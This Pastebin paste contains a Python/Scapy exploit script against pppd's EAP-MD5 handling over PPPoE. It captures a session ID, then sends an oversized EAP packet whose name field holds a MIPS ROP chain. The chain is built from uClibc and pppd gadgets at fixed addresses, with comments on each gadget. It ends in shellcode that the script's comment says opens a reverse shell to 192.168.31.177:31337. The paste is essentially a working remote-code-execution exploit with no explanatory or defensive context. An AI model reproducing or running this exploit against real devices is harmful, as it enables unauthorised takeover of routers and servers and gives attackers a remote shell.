Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from scapy.all import *
- from socket import *
- interface = "enp0s31f6"
- sessionid = 0
- def mysend(pay,interface = interface):
- # time.sleep(0.5)
- #s = socket(AF_PACKET, SOCK_RAW)
- #s.bind((interface, 0))
- #s.send(pay)
- sendp(pay, iface = interface)
- def packet_callback(packet):
- global sessionid
- sessionid = int(packet['PPP over Ethernet'].sessionid)
- print("sessionid:" + str(sessionid))
- def eap_response_md5():
- """
- Ethernet II, Src: Vmware_b9:de:6c (00:0c:29:b9:de:6c), Dst: Vmware_83:48:19 (00:0c:29:83:48:19) Type: PPPoE Session (0x8864)
- PPPoes : Version(4bits) + type(4bits) + code + session ID + payload length
- PPP : Extensible Authentication Protocol (0xc227)
- EAP :
- Code: Request (1)
- Id: 131
- Length: 344
- Type: MD5-Challenge EAP (EAP-MD5-CHALLENGE) (4)
- EAP-MD5 Value-Size: 18
- EAP-MD5 Value: ef0a5c972ecfaeb3307310e99d81f9b0decf
- EAP-MD5 Extra Data: 414141414141414141414141414141414141414141414141...
- pay = "\x00\x0c\x29\x83\x48\x19" \
- "\x00\x0c\x29\xb9\xde\x6c" \
- "\x88\x64\x11\x00" \
- "\x00" + chr(sessionid) + "\x01\x5a\xc2\x27\x01\x83\x01\x58\x04\x12\xef\x0a\x5c\x97" \
- "\x2e\xcf\xae\xb3\x30\x73\x10\xe9\x9d\x81\xf9\xb0\xde\xcf\x41\x41" \
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + 'a'*0x100
- """
- #libuclibc base: 77eaa000
- src = b"\x00\x00\x00\x00\x00\x00"
- dst = b"\x00\x00\x00\x00\x00\x00"
- ethertype = b"\x88\x64"
- md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"
- local_28 = b'\x84\x57\x44\x00'
- # Loaded from 0x42590c
- s0 = b"\x4c\x4a\xEC\x77" # uclibc 0x0001aa4c : subu $sp, $sp, $v0 ; addiu $s3, $sp, 0x18 ; move $a0, $s3 ; move $a1, $s6 ; move $t9, $s1 ; jalr $t9 ; move $a2, $s7
- s1 = b"\x84\x7D\xEB\x77" # uclibc 0x0000dd84 : move $t9, $s4 ; lbu $s6, -1($v0) ; jalr $t9 ; move $a0, $s2 ; addiu $a2, $v0, 1 ; addiu $a0, $s0, 0xb ; move $t9, $s3 ; jalr $t9 ; move $a1, $s2
- s2 = b"\xC0\x04\x00\x00" # 0x4C0 How far we are rewinding the stack pointer
- s3 = b"\x01\x00\x00\x00" # !0
- s4 = b"\x0c\x93\x40\x00" # 0x0040930c lw $s5, 0x3c($sp) ; lw $s4, 0x38($sp) ; lw $s3, 0x34($sp) ; lw $s2, 0x30($sp) ; lw $s1, 0x2c($sp) ; lw $s0, 0x28($sp) ; jr $ra ; addiu $sp, $sp, 0x48
- s5 = b"\x00\x00\x00\x00"
- ra = b"\x0c\x2d\x41\x00" # 0x00412d0c : move $v0, $s2 ; beqz $s3, 0x412d4c ; addiu $s6, $s6, 1 ; lbu $a2, -1($s6) ; move $a0, $s1 ; move $t9, $s0 ; jalr $t9 ; move $a1, $s4
- new_s0 = b"\x01\x00\x00\x00" # 1 (loaded in to $a0, then +0xb later)
- new_s1 = b"\x00\x00\x00\x00"
- new_s2 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
- new_s3 = b"\xA8\x85\xEF\x77" # 77EF85A8 libuClibc.txt:0x0004e5a8 : lw $ra, 0x24($sp) ; lw $s1, 0x1c($sp) ; lw $s0, 0x18($sp) ; move $t9, $s2 ; lw $s2, 0x20($sp) ; jr $t9 ; addiu $sp, $sp, 0x28
- new_s4 = b"\x00\x00\x00\x00"
- new_s5 = b"\x00\x00\x00\x00"
- c6_s0 = b"\x74\xd8\x40\x00" # pppd.txt:0x0040d874 : move $t9, $s1 ; jalr $t9 ; nop
- c6_s1 = b"\x00\x00\x00\x00"
- c6_s2 = b"\x00\x00\x00\x00"
- c6_ra = b"\x90\x37\xEC\x77" # libuClibc.txt:0x00019790 : addiu $s1, $sp, 0x10 ; move $a0, $s1 ; move $t9, $s0 ; jalr $t9 ; move $a1, $s4
- # Reverse shell, connect to 192.168.31.177:31337
- stg3_SC = b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
- stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
- stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
- stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
- stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
- stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
- stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
- stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
- stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
- stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
- stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
- stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
- stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"
- #Debug sleep
- #s0 = b"\x00\x00\x00\x00"
- #s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
- #s2 = b"\x03\x00\x00\x00"
- #s3 = b"\x01\x00\x00\x00"
- #s4 = b"\x0c\x93\x40\x00"
- #s5 = b"\x00\x00\x00\x00"
- #ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9
- rop_chain = (b'A' * 0x17C)
- rop_chain += local_28
- rop_chain += (b'A' * 0x4)
- rop_chain += s0
- rop_chain += s1
- rop_chain += s2
- rop_chain += s3
- rop_chain += s4
- rop_chain += s5
- rop_chain += ra
- #Only rewound the sp by 4C0, so there's 0x100 left
- rop_chain += (b'A' * 0x100)
- rop_chain += (b'A' * 0x28)
- rop_chain += new_s0
- rop_chain += new_s1
- rop_chain += new_s2
- rop_chain += new_s3
- rop_chain += new_s4
- rop_chain += new_s5
- rop_chain += (b'A' * 0x8)
- rop_chain += (b'A' * 0x18)
- rop_chain += c6_s0
- rop_chain += c6_s1
- rop_chain += c6_s2
- rop_chain += c6_ra
- rop_chain += (b'A' * 0x10)
- rop_chain += stg3_SC
- #Just padding the end a little, since the last byte gets set to 0x00?
- rop_chain += (b'A' * 0x8)
- pay = Raw(dst + src + ethertype)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain)
- mysend(pay)
- if __name__ == '__main__':
- sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1)
- eap_response_md5()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement